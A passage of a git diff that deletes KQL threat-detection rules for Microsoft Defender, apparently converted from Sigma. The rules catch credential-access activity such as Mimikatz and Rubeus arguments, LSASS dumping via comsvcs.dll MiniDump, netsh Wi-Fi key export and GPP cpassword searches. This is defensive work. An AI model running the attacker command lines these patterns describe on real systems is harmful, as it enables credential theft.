-// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
-// Tags: attack.credential_access, attack.t1003.002
-DeviceRegistryEvents
-| where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start"))
\ No newline at end of file
diff --git a/Credential Access/Findstr_GPP_Passwords.kql b/Credential Access/Findstr_GPP_Passwords.kql
deleted file mode 100644
index 2edc5195..00000000
--- a/Credential Access/Findstr_GPP_Passwords.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/27
-// Level: high
-// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_ADCSPwn_Execution.kql b/Credential Access/HackTool_-_ADCSPwn_Execution.kql
deleted file mode 100644
index 36f7298a..00000000
--- a/Credential Access/HackTool_-_ADCSPwn_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/31
-// Level: high
-// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
-// Tags: attack.credential_access, attack.t1557.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port "
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Certify_Execution.kql b/Credential Access/HackTool_-_Certify_Execution.kql
deleted file mode 100644
index 1f56d25c..00000000
--- a/Credential Access/HackTool_-_Certify_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:"))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Certipy_Execution.kql b/Credential Access/HackTool_-_Certipy_Execution.kql
deleted file mode 100644
index 39f45158..00000000
--- a/Credential Access/HackTool_-_Certipy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " auth " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list"))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_CrackMapExec_Execution.kql b/Credential Access/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Credential Access/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql b/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql
deleted file mode 100644
index 8b3ce06f..00000000
--- a/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/12
-// Level: high
-// Description: Detects suspicious process patterns found in logs when CrackMapExec is used
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql b/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql
deleted file mode 100644
index 666d65b4..00000000
--- a/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/02/04
-// Level: critical
-// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath endswith "dumpert.dmp"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql b/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql
deleted file mode 100644
index 3733349a..00000000
--- a/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/27
-// Level: high
-// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
-// Tags: attack.credential_access, attack.t1110.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql b/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql
deleted file mode 100644
index 271ce887..00000000
--- a/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vasiliy Burov
-// Date: 2020/10/05
-// Level: high
-// Description: Detects command line parameters used by Hydra password guessing hack tool
-// Tags: attack.credential_access, attack.t1110, attack.t1110.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Inveigh_Execution.kql b/Credential Access/HackTool_-_Inveigh_Execution.kql
deleted file mode 100644
index 55ed6692..00000000
--- a/Credential Access/HackTool_-_Inveigh_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/24
-// Level: critical
-// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_KrbRelayUp_Execution.kql b/Credential Access/HackTool_-_KrbRelayUp_Execution.kql
deleted file mode 100644
index d07c94db..00000000
--- a/Credential Access/HackTool_-_KrbRelayUp_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/26
-// Level: high
-// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
-// Tags: attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_KrbRelay_Execution.kql b/Credential Access/HackTool_-_KrbRelay_Execution.kql
deleted file mode 100644
index 41c083fa..00000000
--- a/Credential Access/HackTool_-_KrbRelay_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the use of KrbRelay, a Kerberos relaying tool
-// Tags: attack.credential_access, attack.t1558.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Mimikatz_Execution.kql b/Credential Access/HackTool_-_Mimikatz_Execution.kql
deleted file mode 100644
index dc21b4df..00000000
--- a/Credential Access/HackTool_-_Mimikatz_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
-// Date: 2019/10/22
-// Level: high
-// Description: Detection well-known mimikatz command line arguments
-// Tags: attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql b/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql
deleted file mode 100644
index 981465c3..00000000
--- a/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql b/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql
deleted file mode 100644
index aee2a9e3..00000000
--- a/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/05
-// Level: high
-// Description: Detects usage of the Quarks PwDump tool via commandline arguments
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Rubeus_Execution.kql b/Credential Access/HackTool_-_Rubeus_Execution.kql
deleted file mode 100644
index 134f2523..00000000
--- a/Credential Access/HackTool_-_Rubeus_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
-// Tags: attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_SafetyKatz_Execution.kql b/Credential Access/HackTool_-_SafetyKatz_Execution.kql
deleted file mode 100644
index 2931012e..00000000
--- a/Credential Access/HackTool_-_SafetyKatz_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/20
-// Level: critical
-// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_SecurityXploded_Execution.kql b/Credential Access/HackTool_-_SecurityXploded_Execution.kql
deleted file mode 100644
index 6a2b1712..00000000
--- a/Credential Access/HackTool_-_SecurityXploded_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of SecurityXploded Tools
-// Tags: attack.credential_access, attack.t1555
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_WinPwn_Execution.kql b/Credential Access/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Credential Access/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Credential Access/Hacktool_Execution_-_PE_Metadata.kql b/Credential Access/Hacktool_Execution_-_PE_Metadata.kql
deleted file mode 100644
index 9f37a725..00000000
--- a/Credential Access/Hacktool_Execution_-_PE_Metadata.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
-// Tags: attack.credential_access, attack.t1588.002, attack.t1003
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Cube0x0"
\ No newline at end of file
diff --git a/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql b/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
deleted file mode 100644
index 7d6acba4..00000000
--- a/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), oscd.community
-// Date: 2020/04/20
-// Level: medium
-// Description: Detect the harvesting of wifi credentials using netsh.exe
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql b/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
deleted file mode 100644
index ed32575d..00000000
--- a/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where FolderPath endswith "\\ntdsutil.exe"
\ No newline at end of file
diff --git a/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql b/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql
deleted file mode 100644
index 3e04ec9d..00000000
--- a/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
-
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql b/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql
deleted file mode 100644
index 64fa624b..00000000
--- a/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash
-// Date: 2022/12/08
-// Level: high
-// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\"
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql b/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql
deleted file mode 100644
index 1315b6f9..00000000
--- a/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/10/19
-// Level: high
-// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Memory_Dump_Files.kql b/Credential Access/LSASS_Process_Memory_Dump_Files.kql
deleted file mode 100644
index ef02e00f..00000000
--- a/Credential Access/LSASS_Process_Memory_Dump_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/15
-// Level: high
-// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where (FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdump" or FolderPath contains "\\lsassdmp") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or (FolderPath endswith ".dmp" and FolderPath startswith "nanodump")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql b/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql
deleted file mode 100644
index 5a56bd67..00000000
--- a/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass")
\ No newline at end of file
diff --git a/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql b/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql
deleted file mode 100644
index 2fa5f37f..00000000
--- a/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash
-// Date: 2022/12/08
-// Level: high
-// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType")
\ No newline at end of file
diff --git a/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql b/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql
deleted file mode 100644
index 8e3a1035..00000000
--- a/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/28
-// Level: high
-// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe")
\ No newline at end of file
diff --git a/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql b/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql
deleted file mode 100644
index 633a86ce..00000000
--- a/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
-// Date: 2022/11/08
-// Level: high
-// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password")))
\ No newline at end of file
diff --git a/Credential Access/Mimikatz_Kirbi_File_Creation.kql b/Credential Access/Mimikatz_Kirbi_File_Creation.kql
deleted file mode 100644
index 29c1c896..00000000
--- a/Credential Access/Mimikatz_Kirbi_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE
-// Date: 2021/11/08
-// Level: critical
